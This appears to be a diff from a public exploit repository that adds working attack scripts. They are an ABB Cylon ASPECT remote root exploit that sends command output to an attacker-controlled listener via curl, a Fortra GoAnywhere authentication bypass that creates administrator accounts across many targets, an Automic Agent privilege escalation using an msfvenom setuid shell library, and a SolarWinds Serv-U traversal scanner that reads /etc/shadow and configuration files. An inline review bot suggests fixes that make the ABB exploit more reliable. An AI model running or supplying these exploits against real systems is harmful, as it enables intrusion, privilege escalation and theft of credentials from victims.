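+# /home/MIX_CMIX/htmlroot
+# exit
+# [o] Removing callback file.
+# [!] Connection terminated.
+#
+# ---------------------------------------------------------------------------------
+#
+#
+# Tested on: GNU/Linux 3.15.10 (armv7l)
+# GNU/Linux 3.10.0 (x86_64)
+# GNU/Linux 2.6.32 (x86_64)
+# Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+# Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+# PHP/7.3.11
+# PHP/5.6.30
+# PHP/5.4.16
+# PHP/4.4.8
+# PHP/5.3.3
+# AspectFT Automation Application Server
+# lighttpd/1.4.32
+# lighttpd/1.4.18
+# Apache/2.2.15 (CentOS)
+# OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+# OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2025-5947
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php
+#
+#
+# 21.04.2024
+#
+#
+from colorama import init, Fore
+from urllib.parse import quote
+from time import sleep
+import threading
+import datetime
+import requests
+import socket
+import re
+import os
+import sys
+init()
+def safe(*trigger, ):
+    return True
+def auth(target_ip, user, pwd):
+    login_ep = f"http://{target_ip}/validate/login.php"
+    payload = {
+        'f_user' : user, # 'aamuser, guest'
+        'f_pass' : pwd, # 'default, guest'
+        'submit' : 'Login'
+    }
+    sess = requests.Session()
+    r = sess.post(login_ep, data=payload)
+    if r.status_code == 200 and 'PHPSESSID' in sess.cookies:
+        print("[o] Auth successfull.")
+        phpsessid = sess.cookies.get('PHPSESSID')
+        print("[o] PHPSESSID:", phpsessid)
+        return sess.cookies
+    else:
+        print("[!] Auth failed.")
+        return None
+def kacuj(target_ip, listen_ip, cmd, token=None, cookies=None):
+    agentwho = "NetRanger/84.19"
+    payload = f"curl -A \"`{cmd}`\" {listen_ip}:5555"
+    url = f"http://{target_ip}/projectUpdateBSXFileProcess.php"
+    headers = {
+        "Content-Type": "multipart/form-data; boundary=----zeroscience",
+        "User-Agent": agentwho
+    }
+    data = (
+        "------zeroscience\r\n"
+        f"Content-Disposition: form-data; name=\"userfile\"; filename={AAM}\r\n"
+        "Content-Type: application/octet-stream\r\n\r\n"
+        f"{payload}\r\n"
+        '------zeroscience--\r\n'
+    )
+    try:
+        r = requests.post(url, headers=headers, data=data, cookies=cookies)
+        if r.status_code == 200:
+            url_execute = f"http://{target_ip}/projectUpdateBSXExecute.php?file={AAM}"
+            r = requests.get(url_execute, cookies=cookies)
+            return r.content
+    except requests.exceptions.RequestException as e:
+        print(f"[!] Error sending payload: {e}")
+        return None
+def koj_slusha(listen_ip):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    s.bind(("0.0.0.0", 5555))
+    s.listen(1)
+    print(f"[o] Listening on {listen_ip}:5555...")
+    while True:
+        conn, addr = s.accept()
+        try:
+            data = conn.recv(9999)
+            if not data:
+                print("[!] Connection closed by remote host.")
+                break
+            dd = data.decode("utf-8", errors="ignore")
+            uam = re.search(r"User-Agent:\s*(.*)\s*Host:", dd, re.DOTALL)
+            if uam:
+                print(uam.group(1), end="")
+            else:
+                print
+                #print(f"[o] Full response:\n{dd}")
+        except Exception as e:
+            print(f"[!] Error while receiving data: {e}")
+        finally:
+            conn.close()
+def main():
+    if safe(True):
+        print("\nSafety: \033[92mON\033[0m")
+        exit(-17)
+    else:
+        next
+    global AAM
+    global start
+    AAM = "firmware.bsx"
+    start = datetime.datetime.now()
+    start = start.strftime("%d.%m.%Y %H:%M:%S")
+    title = "\033[96mABB Cylon® ASPECT® Supervisory Building Control v3.08.03\033[0m"
+    subtl = "\033[95m\t\t-> Remote Root Exploit <-\033[0m"
+    prj = f"""
+    P R O J E C T\033[90m
+    .|
+    | |
+    |'| ._____
+    ___ | | |. |' .---"|
+    _ .-' '-. | | .--'| || | _| |
+    .-'| _.| | || '-__ | | | || |
+    |' | |. | || | | | | || |
+    ____| '-' ' "" '-' '-.' '` |____
+    \033[0m
+    {title}
+    {subtl}
+    """
+    if len(sys.argv) < 4:
+        print(prj)
+        print("./bsxroot.py <targetIP> <listenIP> <PHPSESSID / --creds user:pass>")
+        sys.exit(-0)
+    target_ip = sys.argv[1]
+    listen_ip = sys.argv[2]
+    auth_arg = sys.argv[3]
+    print("[o] Exploit starting at", start)
+    if "--creds" in sys.argv:
+        creds_index = sys.argv.index("--creds") + 1
+        if creds_index >= len(sys.argv):
+            print("[!] Error: Missing credentials after --creds.")
+            sys.exit(-1)
+        user_pass = sys.argv[creds_index]
+        if ":" not in user_pass:
+            print("[!] Error: Invalid credentials format. Expected format: user:pass.")
+            sys.exit(-2)
+        user, pwd = user_pass.split(":")
+        print(f"[o] Using credentials: {user}:{'*' * len(pwd)}")
+        cookies = auth(target_ip, user, pwd)
+    else:
+        token = auth_arg
+        cookies = {"PHPSESSID": token}
+    if not cookies:
+        sys.exit(-3)
+    nishka = threading.Thread(target=koj_slusha, args=(listen_ip,))
+    nishka.daemon = True
+    nishka.start()
+    bacname = f"http://{target_ip}/getApplicationNamesJS.php"
+    r = requests.get(bacname)
+    if r.status_code == 200:
+        try:
+            r = r.content
+            decor = r.decode("utf-8")
+        except UnicodeDecodeError:
+            decor = r.decode("utf-8", errors="ignore")
+        odg = re.search(r"var instanceDirectory=(.*?);", decor)
+        if odg:
+            cmd = "echo -ne \"[o] \" ; cat runtime/release.properties | grep -w 'runtime.ver'"
+            print("[o] Building name:", odg.group(1))
+            kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies)
+            print("\033[92m[+] -> [virtual] rootshell\033[0m\n")
+        else:
+            print("[o] Unknown building name.")
+    sleep(0.01)
+    while True:
+        sleep(0.01)
+        cmd = input("# ")
+        if cmd.lower() in ["exit", "quit"]:
+            print("[o] Removing callback file.")
+            kacuj(target_ip, listen_ip, "rm /tmp/" + AAM, token=None, cookies=cookies)
+            print("\033[91m[!] Connection terminated.\033[0m")
+            os._exit(-17)
+        kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies)
+    nishka.join()
+if __name__ == "__main__":
+    main()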
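Review bot: `user, pwd = user_pass.split(":")` in main() raises ValueError for any password that itself contains a colon, aborting before `auth()` is ever called; `user, pwd = user_pass.split(":", 1)` splits only at the first colon and keeps the rest as the password. The bare `print` in the else branch of `koj_slusha()` is an expression statement that does nothing — it should be `print()` or simply removed. The listener performs a single `conn.recv(9999)` per callback, so command output larger than that is silently truncated; reading until the client closes the connection would be safer for commands like `cat` on large files. On exit the script removes `/tmp/firmware.bsx`, while the header says the uploaded file is moved into htmlroot — presumably the upload handler copies out of /tmp, but it is worth confirming that no copy of the artifact is left on the target after cleanup.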

338
exploits/multiple/remote/52308.py Executable file

@ -0,0 +1,338 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
# Date: 2025-05-25
# Exploit Author: @ibrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft
# Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial
# Version: < 7.4.1
# Tested on: Kali Linux 2024.1
# CVE: CVE-2024-0204
# Description:
# Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability
# that allows unauthenticated attackers to create an administrator account by exploiting a path traversal
# vulnerability to access the initial account setup wizard. This exploit demonstrates two different
# path traversal techniques to maximize successful exploitation across various server configurations.
#
# References:
# - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/
# - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability
# - https://nvd.nist.gov/vuln/detail/cve-2024-0204
import argparse
import concurrent.futures
import os
import socket
import sys
from typing import List, Dict, Tuple, Optional, Union
import requests
from bs4 import BeautifulSoup
from colorama import Fore, Style, init
# Initialize colorama for cross-platform colored output
init(autoreset=True)
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Constants
DEFAULT_TIMEOUT = 10
MAX_THREADS = 10
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
SECONDARY_EXPLOIT_PATH = "/goanywhere/..;/wizard/InitialAccountSetup.xhtml"
class Banner:
@staticmethod
def show():
banner = f"""{Fore.CYAN}
{Style.RESET_ALL}
{Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL}
"""
print(banner)
class GoAnywhereExploit:
def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT):
self.username = username
self.password = password
self.timeout = timeout
self.headers = {"User-Agent": USER_AGENT}
self.vulnerable_targets = []
self.non_vulnerable_targets = []
self.error_targets = []
def check_target(self, target: str) -> Dict:
"""
Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account
Args:
target: The target URL/domain to check
Returns:
Dict containing result information
"""
result = {
"target": target,
"vulnerable": False,
"message": "",
"admin_created": False,
"error": None
}
# Try primary exploit path first
primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH)
if primary_result["vulnerable"]:
return primary_result
# If primary path failed, try secondary exploit path
print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...")
secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH)
if secondary_result["vulnerable"]:
return secondary_result
# If both paths failed, target is not vulnerable
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204")
result["message"] = "Not vulnerable to CVE-2024-0204"
self.non_vulnerable_targets.append(target)
return result
def _try_exploit_path(self, target: str, exploit_path: str) -> Dict:
"""
Try to exploit the target using a specific exploit path
Args:
target: Target to exploit
exploit_path: Path to use for exploitation
Returns:
Dict with exploitation results
"""
result = {
"target": target,
"vulnerable": False,
"message": "",
"admin_created": False,
"error": None
}
try:
url = f"https://{target}{exploit_path}"
session = requests.Session()
# Initial check for vulnerability
response = session.get(
url,
headers=self.headers,
verify=False,
timeout=self.timeout
)
# Determine if target is vulnerable based on response
if response.status_code == 401:
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)")
result["message"] = "Not vulnerable (401 Unauthorized)"
return result
if response.status_code != 200:
print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})")
result["message"] = f"Unexpected response (Status: {response.status_code})"
return result
# Target is potentially vulnerable
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!")
result["vulnerable"] = True
self.vulnerable_targets.append(target)
# Extract ViewState token for the form submission
try:
soup = BeautifulSoup(response.text, "html.parser")
view_state = soup.find('input', {'name': 'javax.faces.ViewState'})
if not view_state or not view_state.get('value'):
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}")
result["message"] = "Could not extract ViewState token"
return result
# Prepare data for admin account creation
data = {
"j_id_u:creteAdminGrid:username": self.username,
"j_id_u:creteAdminGrid:password_hinput": self.password,
"j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
"j_id_u:creteAdminGrid:confirmPassword_hinput": self.password,
"j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
"j_id_u:creteAdminGrid:submitButton": "",
"createAdminForm_SUBMIT": 1,
"javax.faces.ViewState": view_state['value']
}
# Attempt to create admin account
create_response = session.post(
url,
headers=self.headers,
data=data,
verify=False,
timeout=self.timeout
)
if create_response.status_code == 200:
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}")
result["admin_created"] = True
result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}"
else:
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})")
result["message"] = f"Failed to create admin account (Status: {create_response.status_code})"
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}")
result["message"] = f"Error extracting form data: {str(e)}"
result["error"] = str(e)
except requests.exceptions.ConnectTimeout:
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection timeout")
result["message"] = "Connection timeout"
result["error"] = "Connection timeout"
self.error_targets.append(target)
except requests.exceptions.ConnectionError:
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error")
result["message"] = "Connection error"
result["error"] = "Connection error"
self.error_targets.append(target)
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}")
result["message"] = f"Error: {str(e)}"
result["error"] = str(e)
self.error_targets.append(target)
return result
def scan_targets(self, targets: List[str]) -> None:
"""
Scan multiple targets concurrently
Args:
targets: List of targets to scan
"""
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
executor.map(self.check_target, targets)
def load_targets_from_file(self, file_path: str) -> List[str]:
"""
Load targets from a file
Args:
file_path: Path to the file containing targets
Returns:
List of targets
"""
if not os.path.exists(file_path):
print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}")
return []
try:
with open(file_path, "r") as f:
return [line.strip() for line in f if line.strip()]
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}")
return []
def print_summary(self) -> None:
"""Print a summary of the scanning results"""
print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:")
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}")
print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}")
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}Error targets: {len(self.error_targets)}")
if self.vulnerable_targets:
print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:")
for target in self.vulnerable_targets:
print(f" - {target}")
def validate_args(args):
"""Validate command line arguments"""
if not args.target and not args.file:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)")
return False
if args.file and not os.path.exists(args.file):
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}")
return False
if not args.username or not args.password:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)")
return False
return True
def main():
"""Main function"""
parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit")
parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')")
parser.add_argument('-f', '--file', help="File containing targets, one per line")
parser.add_argument('-u', '--username', help="Username for the admin account to create")
parser.add_argument('-p', '--password', help="Password for the admin account to create")
parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})")
parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})")
args = parser.parse_args()
# Show banner
Banner.show()
# Validate arguments
if not validate_args(args):
parser.print_help()
sys.exit(1)
# Initialize exploit
exploit = GoAnywhereExploit(
username=args.username,
password=args.password,
timeout=args.timeout
)
# Handle single target
if args.target:
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: {args.target}")
exploit.check_target(args.target)
# Handle targets from file
elif args.file:
targets = exploit.load_targets_from_file(args.file)
if not targets:
print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file")
sys.exit(1)
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file")
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n")
exploit.scan_targets(targets)
# Print summary
exploit.print_summary()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user")
sys.exit(0)
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}")
sys.exit(1)


@ -0,0 +1,13 @@
# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971
1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")

408
exploits/multiple/remote/52311.py Executable file

@ -0,0 +1,408 @@
# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
# Date: 2025-05-28
# Exploit Author: @ibrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server
# Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration
# Version: <= 15.4.2 HF1
# Tested on: Kali Linux 2024.1
# CVE: CVE-2024-28995
# Description:
# SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow
# attackers to read sensitive files on the host machine. This exploit demonstrates multiple
# path traversal techniques to access Serv-U log files and other system files on both
# Windows and Linux systems.
#
# References:
# - https://nvd.nist.gov/vuln/detail/cve-2024-28995
# - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/
# - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html
# Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import concurrent.futures
import json
import os
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
import requests
from colorama import Fore, Back, Style, init
# Initialize colorama
init(autoreset=True)
# Disable SSL warnings
try:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
pass
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
BANNER = rf'''
{Fore.CYAN}
______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \( _ )/ _ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ (_) \__, |\__, |___) |
\____| \_/ |_____| |_____|\___/_____| |_| |_____\___/ /_/ /_/|____/
{Fore.YELLOW}
SolarWinds Serv-U Directory Traversal Exploit
{Fore.RED} CVE-2024-28995 by @ibrahimsql
{Style.RESET_ALL}
'''
class ScanResult:
def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None):
self.url = url
self.is_vulnerable = is_vulnerable
self.version = version
self.os_type = os_type
self.file_content = file_content
self.path = path
self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
def to_dict(self):
return {
"url": self.url,
"is_vulnerable": self.is_vulnerable,
"version": self.version,
"os_type": self.os_type,
"path": self.path,
"timestamp": self.timestamp
}
def print_banner():
print(BANNER)
def normalize_url(url):
"""Normalize URL to ensure it has http/https protocol."""
if not url.startswith('http'):
url = f"https://{url}"
return url.rstrip('/')
def extract_server_version(headers):
"""Extract Serv-U version from server headers if available."""
if 'Server' in headers:
server_header = headers['Server']
# Look for Serv-U version pattern
match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header)
if match:
return match.group(1)
return None
def is_vulnerable_version(version):
"""Check if the detected version is vulnerable (15.4.2 HF1 or lower)."""
if not version:
return None
try:
# Split version numbers
major, minor, patch = map(int, version.split('.'))
# Vulnerable if lower than 15.4.2 HF2
if major < 15:
return True
elif major == 15:
if minor < 4:
return True
elif minor == 4:
if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable
return True
except:
pass
return False
def get_request(url, timeout=15):
"""Make a GET request to the specified URL."""
try:
response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False)
return response
except requests.RequestException as e:
return None
def detect_os_type(content):
"""Detect the operating system type from the file content."""
if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]):
return "Linux"
elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]):
return "Windows"
return None
def get_default_payloads():
"""Return a list of directory traversal payloads specific to CVE-2024-28995."""
return [
# Windows payloads - Serv-U specific files
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"},
{"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"},
{"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"},
{"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"},
# Verify Windows with various system files
{"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"},
{"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"},
{"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"},
{"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"},
{"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"},
{"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"},
# Verify Linux with various system files
{"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"},
{"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"},
{"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"},
{"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"}
]
def create_custom_payload(directory, filename):
"""Create a custom payload with the specified directory and filename."""
# Try both encoding styles
payloads = [
{"path": f"/?InternalDir=/./../../../{directory}&InternalFile=(unknown)", "name": f"Custom (unknown)"},
{"path": f"/?InternalDir=/../../../../{directory}^&InternalFile=(unknown)", "name": f"Custom (unknown) Alt"},
{"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile=(unknown)", "name": f"Custom (unknown) Alt2"}
]
return payloads
def load_wordlist(wordlist_path):
"""Load custom paths from a wordlist file."""
payloads = []
try:
with open(wordlist_path, 'r') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
# Check if the line contains a directory and file separated by a delimiter
if ':' in line:
directory, filename = line.split(':', 1)
payloads.extend(create_custom_payload(directory, filename))
else:
# Assume it's a complete path
payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."})
return payloads
except Exception as e:
print(f"{Fore.RED}[!] Error loading wordlist: {e}{Style.RESET_ALL}")
return []
def scan_target(url, custom_payloads=None):
"""Scan a target URL for the CVE-2024-28995 vulnerability."""
url = normalize_url(url)
result = ScanResult(url)
# Try to get server version first
try:
response = get_request(url)
if response and response.headers:
result.version = extract_server_version(response.headers)
vulnerable_version = is_vulnerable_version(result.version)
if vulnerable_version is False:
print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}")
# Still continue scanning as version detection may not be reliable
except Exception as e:
pass
# Get all payloads to try
payloads = get_default_payloads()
if custom_payloads:
payloads.extend(custom_payloads)
# Try each payload
for payload in payloads:
full_url = f"{url}{payload['path']}"
try:
print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}")
response = get_request(full_url)
if response and response.status_code == 200:
content = response.text
# Check if the response contains meaningful content
if len(content) > 100: # Arbitrary threshold to filter out error pages
os_type = detect_os_type(content)
if os_type:
result.is_vulnerable = True
result.os_type = os_type
result.file_content = content
result.path = payload['path']
print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}")
# Successful match - no need to try more payloads
return result
except Exception as e:
continue
if not result.is_vulnerable:
print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}")
return result
def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None):
"""Scan multiple targets using thread pool."""
results = []
custom_payloads = []
# Add custom payloads if specified
if custom_dir and custom_file:
custom_payloads.extend(create_custom_payload(custom_dir, custom_file))
# Add wordlist payloads if specified
if wordlist:
custom_payloads.extend(load_wordlist(wordlist))
print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}")
# Use fixed thread count of 10
with ThreadPoolExecutor(max_workers=10) as executor:
future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets}
for future in as_completed(future_to_url):
try:
result = future.result()
results.append(result)
except Exception as e:
print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}")
return results
def save_results(results, output_file):
"""Save scan results to a JSON file."""
output_data = [result.to_dict() for result in results]
try:
with open(output_file, 'w') as f:
json.dump(output_data, f, indent=2)
print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] Error saving results: {e}{Style.RESET_ALL}")
def save_vulnerable_content(result, output_dir):
"""Save the vulnerable file content to a file."""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Create a safe filename from the URL
parsed_url = urlparse(result.url)
safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt"
output_path = os.path.join(output_dir, safe_filename)
try:
with open(output_path, 'w') as f:
f.write(f"URL: {result.url}\n")
f.write(f"Path: {result.path}\n")
f.write(f"Version: {result.version or 'Unknown'}\n")
f.write(f"OS Type: {result.os_type or 'Unknown'}\n")
f.write(f"Timestamp: {result.timestamp}\n")
f.write("\n--- File Content ---\n")
f.write(result.file_content)
